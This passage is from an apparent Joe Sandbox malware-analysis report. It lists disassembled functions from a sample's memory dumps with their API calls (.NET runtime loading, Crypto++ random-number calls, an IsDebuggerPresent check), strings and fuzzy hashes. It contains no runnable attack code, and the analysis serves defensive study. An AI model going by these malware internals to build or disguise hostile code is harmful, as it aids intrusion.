                                                          • Instruction Fuzzy Hash: D2014537014204AFCB064F90D948D81BFB6FB4D320B0A80C1EA488B132D232C960EB51
                                                          Function 03397D10 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bdc63298a29e0663032f49d97ec266d731ab6afbb5ae1181cf10cd99223bcb7
                                                          • Instruction ID: 3ac22c4f28e965b893ff69a37940c4471e54407c62bd724977c316caa85dccd6
                                                          • Opcode Fuzzy Hash: 6bdc63298a29e0663032f49d97ec266d731ab6afbb5ae1181cf10cd99223bcb7
                                                          • Instruction Fuzzy Hash: A5E06535304259AB8F062E559C648BE7F6EDBC8261B048017FD59C2295CB35C92197A0
                                                          Function 0339B1AF Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8951fc4bbd840a25f6cdbf67966fd9b8473b897efc117dee821f19c3e03ac680
                                                          • Instruction ID: c209d217749641a26c83d5f0a6870f86c741e2ca1ea6323cf1757f2b9957722e
                                                          • Opcode Fuzzy Hash: 8951fc4bbd840a25f6cdbf67966fd9b8473b897efc117dee821f19c3e03ac680
                                                          • Instruction Fuzzy Hash: 54E04F7704C244EAFF02D650BC8FA71FF2C9F55240B0C4043FA0389852D55144544352
                                                          Function 03399290 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1f0edc8b8a260d2cfe2e8223367731019b8c26d8a1ba4a4ee6b16935dca4f16
                                                          • Instruction ID: 17b32954443c89a6e768c749dc0de8953af1612beb22016708477dc3e10d26bd
                                                          • Opcode Fuzzy Hash: d1f0edc8b8a260d2cfe2e8223367731019b8c26d8a1ba4a4ee6b16935dca4f16
                                                          • Instruction Fuzzy Hash: 24F09EB4D0120DDFCB44EFE8D9546ADBBF4BF48304F10416AD859A3344DB305A41DB91
                                                          Function 0339DEBB Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58b409e6631d2e2faef85c0e58d5b331769823e5beab68b1569c46a316c4f7d6
                                                          • Instruction ID: 4b398274140e7f112e55bc34481c76cc9ab4eeb122194cd2082c792ad289bc72
                                                          • Opcode Fuzzy Hash: 58b409e6631d2e2faef85c0e58d5b331769823e5beab68b1569c46a316c4f7d6
                                                          • Instruction Fuzzy Hash: 16E0D832A04344CFEB25DF1CD4D9769B7E9EB55300F084657E0428BAA5CB60ED458388
                                                          Function 0339C190 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d9d7d9391457520fa070abf6393adb1e98c00c27f51de791ce1f43c13318699
                                                          • Instruction ID: 95b72e51d1002f1b62a9e78957ff229e631954216e06de380e13d37c3289c2b7
                                                          • Opcode Fuzzy Hash: 6d9d7d9391457520fa070abf6393adb1e98c00c27f51de791ce1f43c13318699
                                                          • Instruction Fuzzy Hash: 65E08670B0138C9BCB50DBB8D60075EBFFDDB41344F1041A9DC08CB259EA355A059781
                                                          Function 03393069 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12bea7d68f997eb35f37e7be91e2311d03247a552595d9ed8c3a9a0fcb68530d
                                                          • Instruction ID: 3eb5307d1c0d7cd35fa733094a77019dd28f6437dd5ea8a5743f191dd3ad6d94
                                                          • Opcode Fuzzy Hash: 12bea7d68f997eb35f37e7be91e2311d03247a552595d9ed8c3a9a0fcb68530d
                                                          • Instruction Fuzzy Hash: CFE086301483849FDF11DB70DC5D719BFA9AF42330F0A44A6D445CB666DA3DD864C602
                                                          Function 03399B88 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9f6438c76bac349d581894110cf8d015836a9a67cabefb39e74f9fea9ada67d
                                                          • Instruction ID: 31356bda23894c9cc2fa01353e45ff244d8ea0e256a6c7a884746ac4119db927
                                                          • Opcode Fuzzy Hash: d9f6438c76bac349d581894110cf8d015836a9a67cabefb39e74f9fea9ada67d
                                                          • Instruction Fuzzy Hash: 6CE0BF30989209CFEF14DFA1C5D5BBD7B39AB45304F10085EC0066A645DBB95940CB41
                                                          Function 0339C1A0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 337fb63f351bf4bf9cd691f4d970bed3d1dec43626fbcece7f75fe5640f778cd
                                                          • Instruction ID: 739a7c3eab5252295038499a789312a8a1530bcb4f69e50452b030e3cddd0da3
                                                          • Opcode Fuzzy Hash: 337fb63f351bf4bf9cd691f4d970bed3d1dec43626fbcece7f75fe5640f778cd
                                                          • Instruction Fuzzy Hash: C2D01730B01208EFCB40EBB8D60065EBBE9EB85304F2041A8D809CB354E9369E008791
                                                          Function 03393078 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49db0dafbf113ec6d8ee962fa95768ed0835c982e1358fc635072b90e94b9a87
                                                          • Instruction ID: 881310a1b1a04899ad4739382f0b6f9ac53a0e8db7af77fb6f27aa4ba91a5c68
                                                          • Opcode Fuzzy Hash: 49db0dafbf113ec6d8ee962fa95768ed0835c982e1358fc635072b90e94b9a87
                                                          • Instruction Fuzzy Hash: CDD01274600308EFEF10AB71ED4D71ABBADAB00361F058036E907C2361DB39CC54C550
                                                          Function 033978D8 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7a9951ac43b36b7ce4740e95b2e41c8599faf0f99df45be559fe7ce6fa142f5
                                                          • Instruction ID: 501a441a025183b22d03b254f4b400c483ce1b594af609b7e4f1637d53b78a5b
                                                          • Opcode Fuzzy Hash: d7a9951ac43b36b7ce4740e95b2e41c8599faf0f99df45be559fe7ce6fa142f5
                                                          • Instruction Fuzzy Hash: 3CC04C75154301AAE614AA40CB5AB46F661BF50B05F04C349FE48180C687B15868FB51

                                                          Non-executed Functions

                                                          Function 6CF72D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF72DFF
                                                          • VariantInit.OLEAUT32(?), ref: 6CF72E08
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF72E7E
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF72EB5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72EC1
                                                            • Part of subcall function 6CF7C850: VariantInit.OLEAUT32(?), ref: 6CF7C88F
                                                            • Part of subcall function 6CF7C850: VariantInit.OLEAUT32(?), ref: 6CF7C895
                                                            • Part of subcall function 6CF7C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7C8A0
                                                            • Part of subcall function 6CF7C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF7C8D5
                                                            • Part of subcall function 6CF7C850: VariantClear.OLEAUT32(?), ref: 6CF7C8E1
                                                          • VariantClear.OLEAUT32(?), ref: 6CF730D5
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF73550
                                                          • VariantClear.OLEAUT32(?), ref: 6CF73563
                                                          • VariantClear.OLEAUT32(?), ref: 6CF73569
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                          • String ID:
                                                          • API String ID: 2012514194-0
                                                          • Opcode ID: 0da63a30b29171bfad96cad8459f7ab96a66479a97b9e726aca9e4916afab3a3
                                                          • Instruction ID: b3583ffeb8b7de1ea39ae6140f3f7a1b6148648b0ddaf9e4c82a7e76dcb35458
                                                          • Opcode Fuzzy Hash: 0da63a30b29171bfad96cad8459f7ab96a66479a97b9e726aca9e4916afab3a3
                                                          • Instruction Fuzzy Hash: 0E527D71D00219DFCB14DFA8D884BEEBBB5BF49304F25819AE909AB750D770A945CFA0
                                                          Function 6CF6A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6CFE0634,6CFE0738,?), ref: 6CF6A119
                                                          • GetModuleHandleW.KERNEL32(mscorwks), ref: 6CF6A145
                                                          • __cftoe.LIBCMT ref: 6CF6A1FB
                                                          • GetModuleHandleW.KERNEL32(?), ref: 6CF6A215
                                                          • GetProcAddress.KERNEL32(00000000,00000018), ref: 6CF6A265
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                          • String ID: mscorwks$v2.0.50727$wks
                                                          • API String ID: 1312202379-2066655427
                                                          • Opcode ID: ee9f8caf82943ebfb0ae925347d499d80c1234aaac9d3a2362d3bcd6f200f91f
                                                          • Instruction ID: cd471b464b0412d9a6be3e16113713dec76c97434331cde2e12e2cb91b77dd4f
                                                          • Opcode Fuzzy Hash: ee9f8caf82943ebfb0ae925347d499d80c1234aaac9d3a2362d3bcd6f200f91f
                                                          • Instruction Fuzzy Hash: 80916870E052999FCB04DFE9D880A9EBBF5FF49304F20866DE119EBA40C731A945CB94
                                                          Function 6CFADBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,CA0C7769,6CFD8180,00000000,?), ref: 6CFADBFB
                                                          • GetLastError.KERNEL32 ref: 6CFADC01
                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CFADC15
                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CFADC26
                                                          • SetLastError.KERNEL32(00000000), ref: 6CFADC2D
                                                            • Part of subcall function 6CFAD9D0: GetLastError.KERNEL32(00000010,CA0C7769,75A8FC30,?,00000000), ref: 6CFADA1A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFADC78
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                                          • API String ID: 3279666080-1159690233
                                                          • Opcode ID: 3d9226b3b2e6df68f5480c6206929e16319b452372c766c6a9c506c20fdbf311
                                                          • Instruction ID: 20af61f33fd47721fdc2f968bfc5c748864d103708b455f755369ba17ea8fe79
                                                          • Opcode Fuzzy Hash: 3d9226b3b2e6df68f5480c6206929e16319b452372c766c6a9c506c20fdbf311
                                                          • Instruction Fuzzy Hash: 3A21D4B1258300BBE310DB64CC45F5BBBF8EB49B44F44091EF541A66C0EBB6E4088B91
                                                          Function 6CFB948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 6CFBCE6C
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CFBCE81
                                                          • UnhandledExceptionFilter.KERNEL32(6CFD9428), ref: 6CFBCE8C
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6CFBCEA8
                                                          • TerminateProcess.KERNEL32(00000000), ref: 6CFBCEAF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID:
                                                          • API String ID: 2579439406-0
                                                          • Opcode ID: 3abcf50774a06ea4cf4e5207da533b9d22282174ff5aacea5f17937036c645ea
                                                          • Instruction ID: ed665da9f1641dc84a2c9dee5745e4aa03443dd489af8deb5d7ad837a86440dc
                                                          • Opcode Fuzzy Hash: 3abcf50774a06ea4cf4e5207da533b9d22282174ff5aacea5f17937036c645ea
                                                          • Instruction Fuzzy Hash: 1E21DFB5F25204DFCBE8DF69E4487453BB8FB0A304F10899AE82997B50E7B09981CF15
                                                          Function 6CFB2310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB24A1
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • std::exception::exception.LIBCMT ref: 6CFB248C
                                                            • Part of subcall function 6CFB9533: std::exception::_Copy_str.LIBCMT ref: 6CFB954E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                          • String ID:
                                                          • API String ID: 757275642-0
                                                          • Opcode ID: 84d0dc122fabb3dc264217e7e2c9242f4a154d5ca4aad352fb7cb3f9b11a04cc
                                                          • Instruction ID: a6c33344c72703cd5b421518d5e01d04f3ee44e71c7c8972323898fb572f3377
                                                          • Opcode Fuzzy Hash: 84d0dc122fabb3dc264217e7e2c9242f4a154d5ca4aad352fb7cb3f9b11a04cc
                                                          • Instruction Fuzzy Hash: 2632A475A016068FDB04CFAAC994A9EB7B5FF89704B24411DE406BBB54EB31ED05CBA0
                                                          Function 6CFA5DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 84714551270ba242d43c364883b51670ad753d173904111bec0198967d1a58c6
                                                          • Instruction ID: a229435be4de3eae232ef9ca338e5357a1adff8e6afc6de737132a5b2791b9d3
                                                          • Opcode Fuzzy Hash: 84714551270ba242d43c364883b51670ad753d173904111bec0198967d1a58c6
                                                          • Instruction Fuzzy Hash: 6D02AE70A283548FC784CF6AE4A063EBFF5EBCA211F41090EE5F697291C274A559CB25
                                                          Function 6CFA5EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 85ec9fc6a264da79af0105b3685c193c4b14d73d31a4d8001e73b8d1d8d31ed6
                                                          • Instruction ID: ea298e3859fb14f60ad92237beb0fcdc0386a94f0c1743fb81f33d51261bce95
                                                          • Opcode Fuzzy Hash: 85ec9fc6a264da79af0105b3685c193c4b14d73d31a4d8001e73b8d1d8d31ed6
                                                          • Instruction Fuzzy Hash: 3BE1A1709283558FC784CB69E8A023EBFF5EBC7211F41090EE5F597291D274A16DCB25
                                                          Function 062B0930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HERE$LOOK$Gvq$Gvq
                                                          • API String ID: 0-802966049
                                                          • Opcode ID: 6439850c85b6c8a39ddf502a4c7eb0055da8e280ff3cf8f478746b4e2b019e38
                                                          • Instruction ID: b15e00614d48095ffecf8808e490c2f5f6b13a807587d565017692952261c5fb
                                                          • Opcode Fuzzy Hash: 6439850c85b6c8a39ddf502a4c7eb0055da8e280ff3cf8f478746b4e2b019e38
                                                          • Instruction Fuzzy Hash: B7F1A074E502298FDBA4DF69C984BDEB7F1EB48310F1495E6D909A7351DB30AE808F90
                                                          Function 6CFADE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptGenRandom.ADVAPI32(?,?,?,CA0C7769,00000000), ref: 6CFADE6F
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFADEB9
                                                            • Part of subcall function 6CFADD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CFCF0E6,000000FF,6CFADF67,00000000,?), ref: 6CFADDB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
